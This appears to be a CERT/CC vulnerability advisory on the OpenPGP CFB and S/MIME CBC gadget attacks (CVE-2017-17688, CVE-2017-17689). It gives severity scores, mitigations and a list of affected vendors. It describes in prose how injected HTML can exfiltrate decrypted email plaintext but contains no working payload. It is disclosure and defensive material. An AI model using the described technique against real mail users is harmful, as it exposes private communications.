5.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.008 Low
EPSS
Percentile
82.0%
Mail clients may leak plaintext messages while decrypting OpenPGP and S/MIME messages.
Email clients supporting the OpenPGP or S/MIME standards may be vulnerable to a CBC/CFB gadget attack which may allow an attacker to inject content into an encrypted email which would establish an exfiltration channel when decrypted by the victimβs email client. For example, injecting an HTML image tag which, when rendered by the email client, sends the plaintext as part of an HTTP request.
CVE-2017-17688: OpenPGP CFB Attacks
CVE-2017-17689: S/MIME CBC Attacks
Additionally some email clients, which do not isolate multiple MIME parts, allow attackers to wrap an encrypted message into plaintext MIME parts, which when decrypted and rendered by the email client results in an HTML based back-channel, eliminating the need to perform the gadget attacks.
Additional details can be found in the paper describing the attacks.
A remote attack could recover plaintext from encrypted emails without access to the encryption keys.
The CERT/CC is currently unaware of a practical solution to this problem. However, there are some mitigations that may be taken:
Decrypt mail outside of mail client
Using a separate application outside of your mail client to decrypt incoming emails prevents exfiltration channels from being opened by the email client.
Disable HTML rendering
Preventing your email client from rendering HTML will prevent the predominant form of establishing exfiltration channels.
Disable Remote Content Loading
Preventing your email client from loading remote content without permission can also help against the predominate form of establishing exfiltration channels.
122919
Filter by status: All Affected Not Affected Unknown
Filter by content: __ Additional information available
__ Sort by: Status Alphabetical
Expand all
Javascript is disabled. Click here to view vendors.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 15, 2018
Affected
We have not received a statement from the vendor.
<https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html>
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Updated: May 14, 2018
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
View all 21 vendors __View less vendors __
Group | Score | Vector |
---|---|---|
Base | 0 | AV:β/AC:β/Au:β/C:β/I:β/A:β |
Temporal | 0 | E:ND/RL:ND/RC:ND |
Environmental | 0 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND |
Credit is attributed to Damian Poddebniak, Christian Dresen, Jens Muller, Fabian Ising, Sebastian Schinzel1, Simon Friedberger, Juraj Somorovsky, and Jorg Schwenk
This document was written by Trent Novelly.
CVE IDs: | [CVE-2017-17688 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-17688 >), CVE-2017-17689 |
---|---|
Date Public: | 2018-05-14 Date First Published: |
5.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.008 Low
EPSS
Percentile
82.0%